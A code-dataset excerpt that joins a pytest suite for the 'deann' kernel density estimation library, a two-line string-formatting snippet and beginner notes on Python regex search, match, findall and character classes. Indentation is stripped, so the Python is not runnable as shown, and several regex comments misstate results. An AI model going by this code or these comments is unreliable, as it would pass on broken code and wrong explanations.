(Z,S) = ann_estimator.query(Y)
assert np.all(Z == 0)
assert np.all(S == 0)
ann_object = AnnObject(bnn)
ann_estimator = deann.AnnEstimator(h, kernel, 1, 0, ann_object)
ann_estimator.fit(X)
j = 0
for i in rng.choice(Y.shape[0], NITERS, replace = False):
j += 1
q = Y[i,:]
(Z,S) = ann_estimator.query(q)
assert ann_object.num_of_calls == j
nn_idx = find_nearest_neighbor(q,X,metric)
x = X[nn_idx,:]
dist = np.linalg.norm(q-x, ord = (1 if metric == 'taxicab' else 2))
mu = np.exp(-dist*dist/h/h/2) if kernel == 'gaussian' else np.exp(-dist/h)
mu /= X.shape[0]
assert Z.ndim == 1 and Z.shape[0] == 1
assert Z[0] > 0
assert mu > 0
if dt == np.float64:
assert np.abs(Z-mu) < DELTA64
assert np.abs(Z-mu)/mu < EPSILON64
elif dt == np.float32:
assert np.abs(Z-mu) < DELTA32
assert np.abs(Z-mu)/mu < EPSILON32
assert S.ndim == 1 and S.shape[0] == 1
assert S.dtype == np.int32
assert S[0] == X.shape[0]
ann_object = AnnObject(bnn)
ann_estimator = deann.AnnEstimator(h, kernel, X.shape[0], 0, ann_object)
ann_estimator.fit(X)
nkde = deann.NaiveKde(h, kernel)
nkde.fit(X)
start = time.time()
(mu, S) = nkde.query(Y)
end = time.time()
print(f'nkde query took {end-start} s')
start = time.time()
(Z, S) = ann_estimator.query(Y)
end = time.time()
print(f'ann estimator query took {end-start} s')
assert np.all(S == X.shape[0])
assert ann_object.num_of_calls == Y.shape[0]
if dt == np.float64:
assert np.all(np.abs(mu-Z) < 1e-15)
elif dt == np.float32:
assert np.all(np.abs(mu-Z) < 1e-6)
for m in [1, 101]:
random_seed += m
ann_object = AnnObject(bnn)
ann_estimator = deann.AnnEstimator(h, kernel, 0, m,
ann_object, random_seed)
ann_estimator.fit(X)
rs = deann.RandomSampling(h, kernel, m, random_seed)
rs.fit(X)
(Z1, S1) = ann_estimator.query(Y)
(Z2, S2) = rs.query(Y)
assert ann_object.num_of_calls == 0
if dt == np.float64:
assert np.all(np.abs(Z1-Z2) < 1e-15)
elif dt == np.float32:
assert np.all(np.abs(Z1-Z2) < 1e-6)
assert np.all(S1 == S2)
params = [(101,203)]
avg_abs_err = np.zeros(len(params))
avg_rel_err = np.zeros(len(params))
i = 0
for (k, m) in params:
random_seed += k*m
ann_object = AnnObject(bnn)
ann_estimator1 = deann.AnnEstimator(h, kernel, k, 0,
ann_object)
ann_estimator1.fit(X)
(Z1, S1) = ann_estimator1.query(Y)
assert ann_object.num_of_calls == Y.shape[0]
assert np.all(S1 == X.shape[0])
ann_estimator2 = deann.AnnEstimator(h, kernel, k, 0,
ann_object)
ann_estimator2.fit(X)
(Z2, S2) = ann_estimator2.query(Y)
assert ann_object.num_of_calls == 2*Y.shape[0]
assert np.array_equal(Z1,Z2)
assert np.all(S2 == X.shape[0])
ann_estimator3 = deann.AnnEstimator(h, kernel, 0, m,
ann_object)
ann_estimator3.fit(X)
(Z3, S3) = ann_estimator3.query(Y)
assert ann_object.num_of_calls == 2*Y.shape[0]
assert np.all(S3 == m)
ann_estimator4 = deann.AnnEstimator(h, kernel, 0, m,
ann_object)
ann_estimator4.fit(X)
(Z4, S4) = ann_estimator4.query(Y)
assert ann_object.num_of_calls == 2*Y.shape[0]
assert not np.array_equal(Z3,Z4)
assert np.all(S4 == m)
ann_estimator5 = deann.AnnEstimator(h, kernel, 0, m,
ann_object, random_seed)
ann_estimator5.fit(X)
(Z5, S5) = ann_estimator5.query(Y)
assert ann_object.num_of_calls == 2*Y.shape[0]
assert np.all(S5 == m)
ann_estimator6 = deann.AnnEstimator(h, kernel, 0, m,
ann_object, random_seed)
ann_estimator6.fit(X)
(Z6, S6) = ann_estimator6.query(Y)
assert ann_object.num_of_calls == 2*Y.shape[0]
assert np.array_equal(Z5,Z6)
assert np.all(S6 == m)
ann_estimator7 = deann.AnnEstimator(h, kernel, k, m,
ann_object, random_seed)
ann_estimator7.fit(X)
(Z7, S7) = ann_estimator7.query(Y)
assert ann_object.num_of_calls == 3*Y.shape[0]
assert np.all(S7 == m + X.shape[0])
ann_estimator8 = deann.AnnEstimator(h, kernel, k, m,
ann_object, random_seed)
ann_estimator8.fit(X)
(Z8, S8) = ann_estimator8.query(Y)
assert ann_object.num_of_calls == 4*Y.shape[0]
assert np.array_equal(Z7,Z8)
assert np.all(S8 == m + X.shape[0])
abs_error = np.mean(np.abs(Z7-mu))
assert abs_error < np.mean(np.abs(Z5-mu))
assert abs_error < np.mean(np.abs(Z1-mu))
rel_error = np.mean(np.abs((Z7-mu)/mu))
assert rel_error < np.mean(np.abs((Z5-mu)/mu))
assert rel_error < np.mean(np.abs((Z1-mu)/mu))
avg_abs_err[i] = abs_error
avg_rel_err[i] = rel_error
i += 1
assert avg_abs_err[-1] < 0.01
assert avg_rel_err[-1] < 0.1
def test_ann_estimator2():
h = 37.0
seed = 527372036
rng = np.random.default_rng()
NITERS = 100
for dt in [np.float32, np.float64]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
Y = Y[rng.choice(Y.shape[0], NITERS, replace = False),:]
for kernel in ['exponential', 'gaussian', 'laplacian']:
metric = 'taxicab' if kernel == 'laplacian' else 'euclidean'
bnn = BruteNN(metric)
bnn.fit(X)
for k in [0, 11]:
for m in [0, 13]:
seed += 1
ann1 = deann.AnnEstimator(h, kernel, k, m, bnn, seed)
ann1.fit(X)
(mu, S0) = ann1.query(Y)
if k == 0 and m == 0:
assert np.all(mu == 0)
assert np.all(S0 == 0)
else:
assert np.all(mu > 0)
if k > 0:
assert np.all(S0 == X.shape[0] + m)
else:
assert np.all(S0 == m)
ann2 = deann.AnnEstimator(h, kernel, k, m, bnn)
ann2.fit(X)
(Z, S1) = ann2.query(Y)
if m == 0:
assert np.array_equal(mu, Z)
else:
assert not np.array_equal(mu,Z)
assert np.array_equal(S0,S1)
ann2.reset_seed(seed)
(Z, S2) = ann2.query(Y)
assert np.array_equal(mu, Z)
assert np.array_equal(S0,S2)
ann3 = deann.AnnEstimator(h, kernel, k+1, m, bnn, seed)
ann3.fit(X)
(Z, S3) = ann3.query(Y)
assert not np.array_equal(mu,Z)
assert np.all(S3 == X.shape[0] + m)
ann3.reset_parameters(k,m)
(Z, S4) = ann3.query(Y)
if m == 0:
assert np.array_equal(mu,Z)
else:
assert not np.array_equal(mu,Z)
assert np.array_equal(S0,S4)
ann3.reset_seed(seed)
(Z, S5) = ann3.query(Y)
assert np.array_equal(mu,Z)
assert np.array_equal(S0,S5)
ann4 = deann.AnnEstimator(h, kernel, k, m+1, bnn, seed)
ann4.fit(X)
(Z, S6) = ann4.query(Y)
assert not np.array_equal(mu,Z)
assert np.array_equal(S0 + 1, S6)
ann4.reset_parameters(k,m)
(Z, S7) = ann4.query(Y)
if m == 0:
assert np.array_equal(mu,Z)
else:
assert not np.array_equal(mu,Z)
assert np.array_equal(S0,S7)
ann4.reset_seed(seed)
(Z, S8) = ann4.query(Y)
assert np.array_equal(mu,Z)
assert np.array_equal(S0,S8)
ann5 = deann.AnnEstimator(h, kernel, k+1, m+1, bnn, seed)
ann5.fit(X)
(Z, S9) = ann5.query(Y)
assert not np.array_equal(mu,Z)
assert np.all(S9 == X.shape[0] + m + 1)
ann5.reset_parameters(k,m)
(Z, S10) = ann5.query(Y)
if m == 0:
assert np.array_equal(mu,Z)
else:
assert not np.array_equal(mu,Z)
assert np.array_equal(S0,S10)
ann5.reset_seed(seed)
(Z, S11) = ann5.query(Y)
assert np.array_equal(mu,Z)
assert np.array_equal(S0,S11)
def test_ann_estimator3():
h = 24.0
seed = 0x055c5b79
DELTA64 = 1e-15
EPSILON64 = 1e-13
DELTA32 = 1e-6
EPSILON32 = 1e-5
rng = np.random.default_rng()
NITERS = 100
for dt in [np.float32, np.float64]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
Y = Y[rng.choice(Y.shape[0], NITERS, replace = False),:]
if dt == np.float32:
DELTA = 1e-3
else:
DELTA = 1e-12
for kernel in ['exponential', 'gaussian', 'laplacian']:
metric = 'taxicab' if kernel == 'laplacian' else 'euclidean'
bnn1 = BruteNN(metric, True, True)
bnn1.fit(X)
bnn2 = BruteNN(metric, False, False)
bnn2.fit(X)
for k in [0, 103, X.shape[0]]:
seed += 1
if k > 0:
for j in range(Y.shape[0]):
q = Y[j,:]
dists, nns1, samples = bnn1.query(q,k)
nns2 = bnn2.query(q,k)
assert samples.ndim == 1 and samples.shape[0] == 1 and samples[0] == X.shape[0]
assert nns1.shape == nns2.shape
assert nns1.shape[0] == 1
assert np.array_equal(nns1, nns2)
for l in range(nns2.shape[1]):
idx = nns2[0,l]
x = X[idx,:]
dist = np.linalg.norm(x-q, ord = 1 if metric == 'taxicab' else 2)
assert abs(dists[0,l] - dist) < DELTA
for m in [0, 123]:
ann1 = deann.AnnEstimator(h, kernel, k, m, bnn1, seed)
ann1.fit(X)
(mu, S) = ann1.query(Y)
if k == 0 and m == 0:
assert np.all(mu == 0)
assert np.all(S == 0)
else:
assert np.all(mu > 0)
if k > 0:
if k >= X.shape[0]:
assert np.all(S == X.shape[0])
else:
assert np.all(S == X.shape[0] + m)
else:
assert np.all(S == m)
ann2 = deann.AnnEstimator(h, kernel, k, m, bnn2, seed)
ann2.fit(X)
(Z, S) = ann2.query(Y)
assert mu.shape == Z.shape
assert S.shape == mu.shape
if k == 0:
assert np.array_equal(Z,mu)
assert np.all(S == m)
else:
for i in range(mu.shape[0]):
if dt == np.float64:
assert np.abs(mu[i]-Z[i]) < DELTA64
assert np.abs(mu[i]-Z[i])/mu[i] < EPSILON64
else:
assert np.abs(mu[i]-Z[i]) < DELTA32
assert np.abs(mu[i]-Z[i])/mu[i] < EPSILON32
assert np.allclose(mu, Z, DELTA64 if dt == np.float64 else DELTA32)
assert np.all(S == -1)
def test_ann_faiss():
m = 100
h = 32.0
seed = 112233
rng = np.random.default_rng()
NITERS = 100
for dt in [np.float32, np.float64]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
Y = Y[rng.choice(Y.shape[0], NITERS, replace = False),:]
nkde = deann.NaiveKde(h, 'exponential')
nkde.fit(X)
mu, _ = nkde.query(Y)
for k in [5,15]:
for n_list in [16, 32]:
fivf = FaissIVF('euclidean', n_list)
ann_fivf = deann.AnnEstimator(h, 'exponential', k, m, fivf)
fivf.fit(X)
ann_fivf.fit(X)
for n_probe in [5, 10]:
fivf.set_query_arguments(n_probe)
Z, S = ann_fivf.query(Y)
assert np.all(S > m)
assert np.all(S < X.shape[0])
assert np.mean(np.abs(mu-Z)) < 0.02
def test_ann_estimator_permuted1():
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObjectInvalid())
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(0.0, 'exponential', 0, 0, AnnObject())
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(-0.0, 'exponential', 0, 0, AnnObject())
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'eXponential', 0, 0, AnnObject())
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', -1, 0, AnnObject())
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', 0, -1, AnnObject())
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones(9,dtype=np.float64))
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((10,9),dtype=np.int64))
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((0,9),dtype=np.float32))
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject()).fit(np.ones((10,0),dtype=np.float32))
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', 100, 0, AnnObject()).fit(np.ones((10,9),dtype=np.float64))
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 100, AnnObject()).fit(np.ones((10,9),dtype=np.float64))
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', 6, 6, AnnObject()).fit(np.ones((10,9),dtype=np.float64))
with pytest.raises(ValueError):
deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject()).query(np.ones((2,9),dtype=np.float64))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float64))
ann_estimator.query(np.ones((2,9),dtype=np.int64))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float64))
ann_estimator.query(np.ones((2,9),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones((2,9),dtype=np.float64))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones((2,9,1),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones((0,9),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones((2,0),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0, AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones(0,dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 1, 0,
AnnObjectInvalidType(False, False))
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones(9,dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 1, 0,
AnnObjectInvalidType(True, False, np.float32))
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones(9,dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 1, 0,
AnnObjectInvalidType(True, True, np.float32))
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones(9,dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 1, 0,
AnnObjectInvalidType(True, True, np.int32, np.int32))
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.query(np.ones(9,dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 100, 0,
AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 100,
AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 6, 6,
AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0,
AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.reset_parameters(100)
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0,
AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.reset_parameters(None, 100)
with pytest.raises(ValueError):
ann_estimator = deann.AnnEstimatorPermuted(1.0, 'exponential', 0, 0,
AnnObject())
ann_estimator.fit(np.ones((10,9),dtype=np.float32))
ann_estimator.reset_parameters(6,6)
random_seed = 0x90f95369
DELTA64 = 1e-15
EPSILON64 = 1e-13
DELTA32 = 1e-6
EPSILON32 = 1e-5
for dt in [np.float64, np.float32]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
h = 21.0
if dt == np.float64:
DELTA = DELTA64
EPSILON = EPSILON32
else:
DELTA = DELTA32
EPSILON = EPSILON32
for kernel in ['exponential', 'gaussian']:
metric = 'euclidean'
bnn = BruteNN(metric)
bnn.fit(X)
ann_estimator = deann.AnnEstimatorPermuted(h, kernel, 0, 0, AnnObject())
ann_estimator.fit(X)
(Z,S) = ann_estimator.query(Y)
assert np.all(Z == 0)
assert np.all(S == 0)
ann_object = AnnObject(bnn)
ann_estimator = deann.AnnEstimatorPermuted(h, kernel, 1, 0, ann_object)
ann_estimator.fit(X)
for i in range(Y.shape[0]):
break
q = Y[i,:]
(Z,S) = ann_estimator.query(q)
assert ann_object.num_of_calls == i+1
nn_idx = find_nearest_neighbor(q,X,metric)
x = X[nn_idx,:]
dist = np.linalg.norm(q-x)
mu = np.exp(-dist*dist/h/h/2) if kernel == 'gaussian' else np.exp(-dist/h)
mu /= X.shape[0]
assert Z.ndim == 1 and Z.shape[0] == 1
assert Z[0] > 0
assert mu > 0
if dt == np.float64:
assert np.abs(Z-mu) < DELTA64
assert np.abs(Z-mu)/mu < EPSILON64
elif dt == np.float32:
assert np.abs(Z-mu) < DELTA32
assert np.abs(Z-mu)/mu < EPSILON32
assert S.ndim == 1 and S.shape[0] == 1
assert S.dtype == np.int32
assert S[0] == X.shape[0]
ann_object = AnnObject(bnn)
ann_estimator = deann.AnnEstimatorPermuted(h, kernel, X.shape[0], 0, ann_object)
ann_estimator.fit(X)
nkde = deann.NaiveKde(h, kernel)
nkde.fit(X)
start = time.time()
(mu, S) = nkde.query(Y)
end = time.time()
print(f'nkde query took {end-start} s')
start = time.time()
(Z, S) = ann_estimator.query(Y)
end = time.time()
print(f'ann estimator query took {end-start} s')
assert np.all(S == X.shape[0])
assert ann_object.num_of_calls == Y.shape[0]
assert np.all(np.abs(mu-Z) < DELTA)
m = 123
random_seed += m
ann_object = AnnObject(bnn)
ann_estimator = deann.AnnEstimatorPermuted(h, kernel, 0, m,
ann_object, random_seed)
ann_estimator.fit(X)
rs = deann.RandomSamplingPermuted(h, kernel, m, random_seed)
rs.fit(X)
(Z1, S1) = ann_estimator.query(Y)
(Z2, S2) = rs.query(Y)
assert ann_object.num_of_calls == 0
assert np.all(np.abs(Z1-Z2) < DELTA)
k, m = 101,203
random_seed += k*m
ann_object = AnnObject(bnn)
ann_estimator1 = deann.AnnEstimatorPermuted(h, kernel, k, 0,
ann_object)
ann_estimator1.fit(X)
(Z1, S1) = ann_estimator1.query(Y)
assert ann_object.num_of_calls == Y.shape[0]
assert np.all(S1 == X.shape[0])
ann_estimator2 = deann.AnnEstimatorPermuted(h, kernel, k, 0,
ann_object)
ann_estimator2.fit(X)
(Z2, S2) = ann_estimator2.query(Y)
assert ann_object.num_of_calls == 2*Y.shape[0]
assert np.array_equal(Z1,Z2)
assert np.all(S2 == X.shape[0])
ann_estimator3 = deann.AnnEstimatorPermuted(h, kernel, 0, m,
ann_object)
ann_estimator3.fit(X)
(Z3, S3) = ann_estimator3.query(Y)
assert ann_object.num_of_calls == 2*Y.shape[0]
assert np.all(S3 == m)
ann_estimator4 = deann.AnnEstimatorPermuted(h, kernel, 0, m,
ann_object)
ann_estimator4.fit(X)
(Z4, S4) = ann_estimator4.query(Y)
assert ann_object.num_of_calls == 2*Y.shape[0]
assert not np.array_equal(Z3,Z4)
assert np.all(S4 == m)
ann_estimator5 = deann.AnnEstimatorPermuted(h, kernel, 0, m,
ann_object, random_seed)
ann_estimator5.fit(X)
(Z5, S5) = ann_estimator5.query(Y)
assert ann_object.num_of_calls == 2*Y.shape[0]
assert np.all(S5 == m)
ann_estimator6 = deann.AnnEstimatorPermuted(h, kernel, 0, m,
ann_object, random_seed)
ann_estimator6.fit(X)
(Z6, S6) = ann_estimator6.query(Y)
assert ann_object.num_of_calls == 2*Y.shape[0]
assert np.array_equal(Z5,Z6)
assert np.all(S6 == m)
ann_estimator7 = deann.AnnEstimatorPermuted(h, kernel, k, m,
ann_object, random_seed)
ann_estimator7.fit(X)
(Z7, S7) = ann_estimator7.query(Y)
assert ann_object.num_of_calls == 3*Y.shape[0]
assert np.all(m + X.shape[0] <= S7)
assert np.all(S7 <= 2*X.shape[0])
ann_estimator8 = deann.AnnEstimatorPermuted(h, kernel, k, m,
ann_object, random_seed)
ann_estimator8.fit(X)
(Z8, S8) = ann_estimator8.query(Y)
assert ann_object.num_of_calls == 4*Y.shape[0]
# these should be equal but for some reason they are
# not necessarily so; this is probably some MKL thing
assert np.array_equal(Z7,Z8) or \
dt == np.float32 and np.amax(np.abs(Z7-Z8)) < 1e-7
assert np.all(m + X.shape[0] <= S8)
assert np.all(S8 <= 2*X.shape[0])
abs_error = np.mean(np.abs(Z7-mu))
assert abs_error < np.mean(np.abs(Z5-mu))
assert abs_error < np.mean(np.abs(Z1-mu))
rel_error = np.mean(np.abs((Z7-mu)/mu))
assert rel_error < np.mean(np.abs((Z5-mu)/mu))
assert rel_error < np.mean(np.abs((Z1-mu)/mu))
assert abs_error < 0.01
assert rel_error < 0.1
def test_ann_estimator_permuted2():
h = 37.0
seed1 = 0xfed712db
seed2 = 0x710867b8
k1 = 123
k2 = 321
m1 = 234
m2 = 432
for dt in [np.float32, np.float64]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
for kernel in ['exponential', 'gaussian']:
seed1 += 1
seed2 += 1
metric = 'euclidean'
bnn = BruteNN(metric)
bnn.fit(X)
ann1 = deann.AnnEstimatorPermuted(h, kernel, k1, m1, bnn, seed1)
ann1.fit(X)
(mu, S0) = ann1.query(Y)
ann2 = deann.AnnEstimatorPermuted(h, kernel, k1, m1, bnn, seed1)
ann2.fit(X)
(Z, S) = ann2.query(Y)
assert np.array_equal(Z,mu)
assert np.array_equal(S,S0)
ann3 = deann.AnnEstimatorPermuted(h, kernel, k2, m2, bnn, seed2)
ann3.fit(X)
(Z, S) = ann3.query(Y)
assert np.all(Z != mu)
assert np.all(S != S0)
ann4 = deann.AnnEstimatorPermuted(h, kernel, k2, m2, bnn, seed2)
ann4.fit(X)
ann4.reset_seed(seed1)
ann4.reset_parameters(k1,m1)
(Z, S) = ann4.query(Y)
assert np.array_equal(Z,mu)
assert np.array_equal(S,S0)
def test_ann_estimator_permuted3():
h = 24.0
seed = 0xf520208d
DELTA64 = 1e-15
EPSILON64 = 1e-13
DELTA32 = 1e-6
EPSILON32 = 1e-5
for dt in [np.float32, np.float64]:
X, Y = construct_test_set()
X = X.astype(dt)
Y = Y.astype(dt)
if dt == np.float32:
DELTA = 1e-3
else:
DELTA = 1e-12
for kernel in ['exponential', 'gaussian']:
metric = 'taxicab' if kernel == 'laplacian' else 'euclidean'
bnn1 = BruteNN(metric, True, True)
bnn1.fit(X)
bnn2 = BruteNN(metric, False, False)
bnn2.fit(X)
for k in [0, 123]:
for m in [0, 321]:
seed += 1
ann1 = deann.AnnEstimatorPermuted(h, kernel, k, m, bnn1, seed)
ann1.fit(X)
(mu, S) = ann1.query(Y)
if k == 0 and m == 0:
assert np.all(mu == 0)
assert np.all(S == 0)
else:
assert np.all(mu > 0)
if k > 0:
assert np.all(S >= X.shape[0] + m)
assert np.all(S <= 2*X.shape[0])
else:
assert np.all(S == m)
ann2 = deann.AnnEstimatorPermuted(h, kernel, k, m, bnn2, seed)
ann2.fit(X)
(Z, S) = ann2.query(Y)
assert mu.shape == Z.shape
assert S.shape == mu.shape
if k == 0:
assert np.array_equal(Z,mu)
assert np.all(S == m)
else:
for i in range(mu.shape[0]):
if dt == np.float64:
assert np.abs(mu[i]-Z[i]) < DELTA64
assert np.abs(mu[i]-Z[i])/mu[i] < EPSILON64
else:
assert np.abs(mu[i]-Z[i]) < DELTA32
assert np.abs(mu[i]-Z[i])/mu[i] < EPSILON32
assert np.allclose(mu, Z, DELTA64 if dt == np.float64 else DELTA32)
assert np.all(S == -1)
if __name__ == '__main__':
X, Y = construct_test_set()
X = X.astype(np.float32)
Y = Y.astype(np.float32)
h = 21.0
kernel = 'gaussian'
random_seed = 2432279547
m = 123
ann_object = BruteNN('euclidean')
ann_object.fit(X)
ann_estimator = deann.AnnEstimatorPermuted(h, kernel, 0, m,
ann_object, random_seed)
ann_estimator.fit(X)
(Z5, S5) = ann_estimator.query(Y)
for fun in [test_naive_kde1, test_naive_kde2, test_random_sampling1,
test_random_sampling2, test_random_sampling_permuted,
test_brute_nn, test_linear_scan, test_ann_estimator1,
test_ann_estimator2, test_ann_estimator3, test_ann_faiss,
test_ann_estimator_permuted1, test_ann_estimator_permuted2,
test_ann_estimator_permuted3]:
start = time.time()
fun()
end = time.time()
print(fun.__name__, end-start)
|
996,860 | 0dc5e6c58f0d10a7c61075ae933703c4a990f359 | print "The %(foo)s is %(bar)i." % {'foo': 'answer', 'bar':42}
print("The {foo} is {bar}".format(foo='answer', bar=42))
|
996,861 | 7bfee06201d235ff4de39f188414bc7b61fc6dcf | import re
re.search('n','\n') #first item is pattern and second item is string
#when we run above code , we did'nt get anything because in python '\n' means new line, it is not
#two character , it is a single character i.e new line
re.search('n','\\n')
#But when we give double \\ we will get the result, so a extra back slash treats it as 2 character
#But if we have more than one \n
re.search('n','\n\n\n\n') #Giving double back slash is not a good idea
#The best way to handle this is to convert it into raw string by using r'
re.search('n',r'\n\n\n')
#Regular has there own special character
#'\n' or r'\n both have a meaning of newline in regex
re.search('\n','\n\n\n') # Here in first parameter it is regex pattern while 2nd parameter is string
#The first parameter is a new line a/c to regex
re.search(r'\n','\n\n\n' )
#We get search result in both the case
#But when we convert the string to raw string then we will get no result
re.search(r'\n',r'\n\n\n' )
#So converting a string with raw string in 2nd parameter will affect the meaning of backslash
#But if we add r' to first parameter then it will change to regex own meaning i.e r'\n is new line in regex
####################################################################################################
# Methods of regex Match and Search
# re.search(pattern,string,flag)
# Pattern - The pattern that needs to search from string
# String - The string which will used to find pattern
# flag- Special option , it helps to situation where we neeed to find multiline
# The difference between match and search is
# Match - It searches for a pattern only at begining of the string
# Search - It searches for a pattern every where of the string
re.match('c','abcdef') #No result found because c is not present at beginging of string
re.search('c','abcdef') #Ressult found because c is present in the string, span(2,3) means the search value
#found at 2nd location and ends at 3rd location
#We can use boolean value also
bool(re.match('c','abcdef'))
# It is only a way how none value can be converted to false
#The problem with search is it only checks for 1 occurance from whole string
re.search('c','abcdcf') # Here span(2,3) shows that 2nd location and ends at 3rd location
#wherease the c also present at 4 position
# Search also works for multi line or new line
re.search('c','abdef\nc') # here we get the match at span(6,7)
re.match('c','abdef\nc') # Match does'nt give any result with newline
#To take print of match pattern
re.match('a','abcdef').group() # here in paraenthesis of group default value is 0
#if we want start and end value of span
re.search('c','abcdef').start()
re.search('c','abcdef').end()
#Literal matching
re.search('na','abcdefnc abcd') #We didnt get any result as 'na' is a single pattern to be found in string
#But when we write
re.search('n|a','abcdefnc abcd') #here it is searching for either n or a
#here a returned because it searches for first instance of either n or a , which may come first
#And here a comes first
# we may write more than or condition
re.search('n|a|b','abcdef nbca')
# Findall
#Search will pull out only first instance where findall will search only instance
re.findall('n|a','bcdefnc abcda') # It will return a list with all presence of n or a in string
#Multiple character
re.search('abcd','abcdef abcd') #It will find occurance of abcd at span(0,4)
re.findall('abcd','abcdef abcd') #It will give list of abcd at two occurance
###########################################################################################
#Character Set
#It can match a set of character
#\w - matches alpha numeric charcater - ie. a-z,A-Z,0-9, It represents any character in the set [a-zA-Z0-9_]
re.search(r'\w\w\w\w','abcdefnc abcd')
# Here 4 alpha numeric charcter is searched , it can be anything i.e abcd or 12m
re.search(r'\w\w\w\w','ab_defnc abcd') # here we get a12d as it is alpha numeric character
re.search(r'\w\w\w\w','ab_.efnc abcd') #Here we did'nt find any symbol . in [a-zA-Z0-9_] So efnc came as result
#Now \W - upper case W any thing which is not included in lower case w is taken by upper case W
re.search(r'\w\w\W','ab.efnc abcd') # So here lower case w does'nt include . and upper case W does, so in
#result we find .
re.search(r'\w\w\W\W','ab. fnc abcd') #here empty set is also printed
#Quatifier - It is also a quanity measurement
#Quatifier comes after character
# + = 1 or more - gridy quantifier
# ? = 0 or 1
# * = 0 or more
# {n,m} = n to m repetations {,3},{3,} n = least and m = most amount or lower bound to upper bound
re.search(r'\w\w','abcdef abcd') # So we find 2 charcter ab
re.search(r'\w+','abcdef abcd') # So here 1 or more character came abcdef but not blank space
re.search(r'\w?','abcdef abcd') # So here 1 or one character came a
re.search(r'\w*','abcdef abcd') # So here 0 or more character came abcdef
re.search(r'\w+\W+\w+','abcdef abcd') # so here all alpha numeric character and blank space and all alpha numeric
#Pulling out specific amount
re.search(r'\w{3}','aaaaaaaaaaa') #Only 3 alpha numeric character
re.search(r'\w{1,3}','aa.') #Start at 1 and till 3 but here since at 3rd position we have . so result is aa
re.search(r'\w{1,10}\W{0,10}\w+','abcdef abcd') # 1-10 alpha numeric character of lower w
# 0-10 upper W character
# 1 or more alpha numeric character of lower w
######################################################################################################
#Other type of character set
#'\d - matches digits [0-9]
#'\D - matches any non digit charcter - ~\d any thing that \d does'nt work for
string = '23abcde++'
re.search('\d+',string).group() #Here 1 or more digit printed 23
#'\s' - matches any whitespace character i.e newline,tab,spaces
